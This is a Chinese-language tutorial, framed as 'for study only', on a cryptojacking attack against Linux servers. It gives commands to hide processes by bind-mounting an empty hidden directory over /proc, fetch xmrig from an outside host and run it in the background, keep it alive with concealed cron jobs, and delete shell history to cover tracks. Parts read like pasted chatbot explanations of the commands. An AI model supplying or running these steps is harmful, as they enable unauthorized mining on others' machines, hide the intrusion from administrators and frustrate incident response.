实战linux-XMR挖矿攻击（仅供学习参考）

进程隐藏

目录挂载

mkdir -p /tmp/.k/null
mount --bind /tmp/.k/null /proc

命令 mkdir /tmp/.k/null 在Linux或类Unix操作系统中用于创建一个新的目录结构。这个命令的组成部分和它们各自的含义如下：

1. mkdir：这是一个命令行工具，用于创建新的目录（文件夹）。如果指定的目录已存在，则通常会显示一个错误消息，除非使用了特定的选项（如 -p）来允许创建多级目录结构而不在每个级别上出错。
2. /tmp/.k/null：这是要创建的目录的路径。这个路径由几个部分组成：
3. /tmp：这是一个系统级别的临时文件存储目录，通常用于存储临时文件，这些文件在系统重启后可能会被删除或清理。任何用户都可以在这个目录下创建、读取、写入和删除文件，但通常不建议存储重要数据，因为这里的数据可能会随时丢失。
4. .k：这是/tmp目录下将要被创建的一个新目录的名称。.（点）在目录名开始时通常表示该目录是隐藏的，即在使用图形界面或某些命令行工具列出目录内容时，默认情况下不会显示。
5. null：这是.k目录下将要被创建的新目录的名称。

综上所述，mkdir /tmp/.k/null命令的作用是在/tmp目录下创建一个名为.k的隐藏目录（如果它还不存在的话），然后在.k目录下再创建一个名为null的子目录。这可以用于存储一些临时数据或文件，这些数据或文件对系统用户来说是隐藏的，并且位于系统的临时文件存储区域中。

需要注意的是，如果/tmp/.k目录已经存在，但/tmp/.k/null目录不存在，那么mkdir /tmp/.k/null命令会成功创建null目录。但是，如果/tmp/.k目录本身不存在，那么命令会失败，除非使用mkdir -p /tmp/.k/null，其中-p选项会指示mkdir命令创建所有必要的父目录。

在Linux系统中，mount --bind 命令用于将一个已存在的目录挂载到另一个位置，使得这两个位置指向同一个文件系统上的相同目录。然而，你给出的命令 mount --bind /tmp/.k/null /proc 尝试将 /tmp/.k/null 目录挂载到 /proc 目录上，这在大多数情况下是不合适的，因为 /proc 目录在Linux中有特殊的用途。

/proc 是一个虚拟文件系统，它包含了系统运行时的信息，如进程信息、内核参数等。这个目录不是用来存储用户数据的，而是由内核动态生成的。尝试将 /tmp/.k/null 挂载到 /proc 可能会导致系统不稳定或无法访问 /proc 目录中的关键信息。

上挖矿马

1. 申请门罗币钱包： 最新教程： https://www.xmr-zh.com/tech/wallet-tech.html

2. 寻找一个矿池加入挖矿: 门罗币矿池很多，你可以随意找一个，例如： https://c3pool.com/cn/ 或者  https://www.f2pool.co/
   在挖矿软件的配置文件中填写你的门罗币钱包地址，和矿池地址： 例如：以 xmrig 挖矿软件 和  supportxmr 矿池为例：

切换到你创建的隐藏目录下下载

wget https://download.c3pool.org/xmrig_setup/raw/master/xmrig.tar.gz

解压

tar -zxvf xmrig.tar.gz

解压后我们得到俩个文件，一个是 xmrig 主程序，一个是 config. Json 配置文件。

配置

输入：vim config.json 打开 config. Json 文件，将 YOUR_WALLET_ADDRESS 修改成你的钱包地址

运行

./xmrig

#后台启动
nohup ./xmrig &

科普

netstat -anpt

如果未隐藏之前是这样的

隐藏之后

计划任务

添加计划任务使其可以开机自启，删除后恢复,准备以下两个脚本文件

代码脚本

上传脚本运行

#上传脚本运行

mkdir /tmp/.s
cd /tmp/.s

chmod 777 1.sh
chmod 777 2.sh

./2.sh

效果：crontab -l ，必须 cat -A 或者 vim、vi 才能看到

nl .bash_history

sed -i '10,$d' .bash_history

查看挖矿进展:去对应的矿池查看收益以 supperxmr 矿池为例